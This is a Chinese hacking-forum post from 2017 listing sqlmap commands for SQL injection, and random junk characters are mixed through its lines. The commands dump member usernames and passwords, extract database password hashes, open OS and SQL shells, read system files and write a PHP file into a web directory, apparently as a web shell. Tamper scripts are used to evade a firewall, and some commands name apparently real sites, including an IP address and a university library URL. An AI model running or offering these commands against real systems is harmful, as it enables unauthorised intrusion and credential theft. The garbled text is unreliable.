找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2083|回复: 0
打印 上一主题 下一主题

sqlmap使用实例

[复制链接]
跳转到指定楼层
楼主
发表于 2017-5-19 17:03:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/pentest/database/sqlmap! f3 v" r- j/ [+ |; y8 h4 K

3 d  O: P& S6 n+ L8 J- uupdate :::::>     in the folder   after  execute    following   order : svn update; s9 u: b* ?, f/ Q
. j9 i5 g. f& \! k2 c5 E
sqlmap.py -r 1.txt --current-db
! T3 S. k/ g' P# z* M+ }7 A  @% l
* d8 ]' w0 ]6 Vv 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
* |/ ?" L5 L3 U( @& J
) b$ O6 [% G- M  i! {# q4 x, C( g' _==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1)) + g+ @  N6 s" J& T, |
猜解数据库
' ~2 C4 w4 Z! C8 C./sqlmap.py -u "injection-url" --dbs
4 B$ `& I6 u+ J6 csqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
5 U0 W$ @6 ~* s6 b) R
1 _5 }- t8 y% `5 t" ^猜解表名
! a3 b' U8 Z7 A. ^1 n./sqlmap.py -u "injection-url" -D database_name --tables
, @1 D! I$ S4 v0 i9 i) E: X, D- T+ K6 {# ~* V- K! l
sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"4 V' h+ o: h+ ?% T" c0 ]
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
8 O  N$ P9 \$ U
* @% A* \6 P' x9 csqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
6 h0 S- Q- f  n& O2 L5 |0 u  u, n5 N3 r9 _* r
sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
$ t3 k3 r7 O7 A0 d9 h& \! gsqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
+ D( Q  x3 f# {9 N$ esqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py" 9 Y6 w  i8 x5 _: W; T
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"8 W+ r- C, c$ R$ r
+ S3 O/ W' n% A* _; W
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py". p4 I$ Y3 y  v% v" N6 F
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"1 V  @( I/ T. u: I- e
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"! |6 R( g1 o3 l5 q
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"4 g( i. J9 d0 G9 F
sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
$ J) g7 k+ W. h$ a% ]
0 K( x6 p0 A3 asqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了
6 s  d6 L- `5 t5 M" B/ C) h8 esqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"! [1 n/ z( f* m. l/ O/ t

1 y; e3 M; U5 I0 B+ I9 ^sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
* z  C5 r& F( x2 G猜解列名& j6 h4 A/ w3 g$ h$ U/ U! U
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns6 ?) ]; f) E7 V& j* g# r) e
7 ]' B8 d2 s, z
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py" . x2 C+ x, j; l* ~9 }" n
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
4 r( i/ K$ C- a( ^+ \8 H! F# psqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
8 c& R; c4 j2 `; o: |& y; G# H: @
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
5 \* i2 I6 z1 F& {8 r6 P2 F8 E( v* Z&submit=Go! D% b* r+ q5 y5 b" i
猜解值
: K% |' @8 A& y# V; v# A./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
$ ?) g& d& J* m" ]: c========================================================- `8 n) C+ r  e% {7 v( T
搜索表名中包括mana字符的
0 R- L/ ]8 y9 X% V: ~/sqlmap.py -u "injection-url" -T mana --search
' r% Z  B" l$ k( ?/ ~返回一个交互式sql shell. S7 y0 q, t+ F8 y  M& f/ y4 N) b
/sqlmap.py -u "injection-url" --sql-shell
( q* c$ r1 i; _3 w. F! I( L读取指定文件(需权限)
# r' M7 j/ a9 L. m5 ?5 U* I/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"( `$ [7 L+ X. l5 ~0 p
查看当前 用户 及 数据库
) T. Z6 E% W+ w1 G# V/sqlmap.py -u "injection-url" --current-user --current-db
2 r; F# F3 z2 C( P. X本地文件 写入 远程目标绝对路径
- |/ ]9 [" H+ C8 }: v; K/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
0 ]' @% R0 q6 B. ^% fsqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
! x2 F3 I1 O" j4 R) \: f6 f5 \
- _9 Q, n. O% a, n% lsqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径8 D0 T1 m9 |# T5 D' o0 H
查看某用的权限/ K/ ~7 {# x) c# @0 f) n
/sqlmap.py -u "injection-url" --privileges -U root
* ?' y) {. V+ F  H5 ^" d查看当前用户是否为dba4 B% m1 E2 G3 f1 K3 \
/sqlmap.py -u "injection-url" --is-dba9 n1 g3 O0 Q3 @! `% d7 {
读取所有数据库用户或指定数据库用户的密码  \) j2 M2 v2 J+ ]; }
sqlmap.py -r 1.txt --users --passwords
+ w  L" X) g- N9 a8 k4 I: Rsqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py" 3 u  T% S$ T) v& b. l+ S

! g! P; \# e2 a5 a, t& B! A/sqlmap.py -u "injection-url" --passwords -U root
& _. X2 F- h# r: {% A- C8 c7 B0 b# f
--start&&--stop 与 --first&&--last 的区别
+ B, W; R" o7 _$ x) W% c; K/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)
7 H$ J' A- @6 x: A) E( ?
: p. I" N. Q4 n& j- e从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)# U% Z1 z8 Q/ u4 {. x
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
% l# B$ A. l7 V% K1 I9 @8 e. ^8 n/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns( {. K$ R) [- a5 `
# y1 v+ S6 a6 u8 ^& T
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)% f/ Z+ }9 L: x0 m# s1 l, Z+ N
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"8 ^6 R: f) V: e2 m0 G1 e
" l& z& ^$ o5 k# m% P( @
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表